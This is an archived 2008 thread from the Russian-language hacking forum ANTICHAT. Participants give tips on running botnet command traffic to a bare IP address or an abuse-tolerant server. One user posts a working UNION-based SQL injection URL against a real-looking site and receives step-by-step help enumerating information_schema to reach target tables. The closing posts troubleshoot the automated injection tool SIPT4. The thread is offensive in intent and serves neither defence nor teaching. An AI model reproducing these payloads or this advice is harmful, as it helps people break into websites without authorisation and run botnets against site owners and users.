ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

28.12.2008, 05:40
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме: 2337678
Репутация:
354
|
|
Набери в браузере 77.88.21.3
попадёшь на яндекс.
Вот так и ты, можешь юзать вместо домена - ip.
Тебе ведь не клиентов заманивать, а трафф принимать. Для ботнета самое то.
|
|
|

28.12.2008, 05:41
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме: 6722038
Репутация:
1385
|
|
Сообщение от diznt
я не понимаю как это? объясни
эм.. ну что сказать, сразу напрашивается вопрос - тебе это надо ?
по сабжу: боты же должны куданить отстукивать? или к ним снизойдёт озарение и они сами придумают чтобы такого сделать ..
так вот, какая им разница куда стучать??
--
и вообще, нах домен абузный, ты ж не спамить домен собрался ..
ну допустим на связку один домен/ip, а на ботнет уже стоит другой .. хотя на одном тож никто не мешает делать .. но энто лишнее паливо всёже .. хотя на абузном серваке пох ваще.
|
|
|

28.12.2008, 19:22
|
|
Постоянный
Регистрация: 21.02.2007
Сообщений: 568
Провел на форуме: 2954516
Репутация:
303
|
|
хелп.
нашёл скулю
http://site.ru/index.php?id_page=216&id_news=36+union+select+1,2, 3,concat(table_name,0x3a,column_name),5+from+infor mation_schema.columns
вывело кучу всего
TRIGGERS:CREATED
TRIGGERS:SQL_MODE
TRIGGERS  EFINER
USER_PRIVILEGES:GRANTEE
USER_PRIVILEGES:TABLE_CATALOG
USER_PRIVILEGES:PRIVILEGE_TYPE
USER_PRIVILEGES:IS_GRANTABLE
VIEWS:TABLE_CATALOG
(часть списка)
Но читать их не получается, всегда ошибка Table doesn't exist
Можно что-нибудь сделать?
|
|
|

28.12.2008, 19:29
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме: 12985021
Репутация:
676
|
|
посмотри бд в которой они хранятся
select table_schema from information_schema.columns where table_name='name'
или сразу так выводи
select+1,2,3,concat(table_schema,0x3a,table_name,0 x3a,column_name),5+from+information_schema.columns
потом ....+from+dbname.table_name
|
|
|

28.12.2008, 19:40
|
|
Постоянный
Регистрация: 21.02.2007
Сообщений: 568
Провел на форуме: 2954516
Репутация:
303
|
|
Сообщение от aka PSIH
посмотри бд в которой они хранятся
select table_schema from information_schema.columns where table_name='name'
или сразу так выводи
select+1,2,3,concat(table_schema,0x3a,table_name,0 x3a,column_name),5+from+information_schema.columns
потом ....+from+dbname.table_name
вывелось так
information_schema:TRIGGERS:CREATED
information_schema:TRIGGERS:SQL_MODE
information_schema:TRIGGERS  EFINER
information_schema:USER_PRIVILEGES:GRANTEE
information_schema:USER_PRIVILEGES:TABLE_CATALOG
information_schema:USER_PRIVILEGES:PRIVILEGE_TYPE
information_schema:USER_PRIVILEGES:IS_GRANTABLE
|
|
|

28.12.2008, 19:42
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме: 12985021
Репутация:
676
|
|
ну выводи теперь то что тебе нужно, в чем проблемма?
|
|
|

28.12.2008, 19:44
|
|
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме: 279406
Репутация:
37
|
|
У меня пара вопросов по программе SIPT4:
1.Почему в некоторых случаях программа может определить принтабельные поля в инъекции, в других нет? При том что инъекции все простые и одинаковые.
2.Что означает каждая из цифр в поле "принтабельные поля": {2},4,5. Я так понимаю, 4 и 5 - это номер поля, а что означает цифра в фигурных скобках? Но это точно не число принтабельных полей.
Был бы признателен еще если бы кто-нибудь дал линк на подробный мануал по проге (а лучше видео).
|
|
|

28.12.2008, 20:17
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
в {} принтабельное поле из найденных (мог бы и сам догадаться)
офф. сайт проги - http://dbattack.com/
Любая авто-тулза работает только в так называемых ИДЕАЛЬНЫХ условиях sql-inj, поэтому предпочтительно всё делать ручками, по крайней мере на начальном этапе.
|
|
|

28.12.2008, 20:32
|
|
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме: 279406
Репутация:
37
|
|
да нет, по-моему... к примеру, есть {2},4,5 - так вот как раз 4 и 5 это принтабельные поля.. ну во всяком случае у меня всегда это были принтабельные поля.. хз, может совпадало так.
http://dbattack.com/ - уже черт знает сколько не работает.
|
|
|

28.12.2008, 20:39
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме: 1571865
Репутация:
571
|
|
Pashkela правильно сказал, просто ты его недопонял.
{2},4,5 - принтабельные, а конкретно через 2-ое поле, прога будет выводить.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|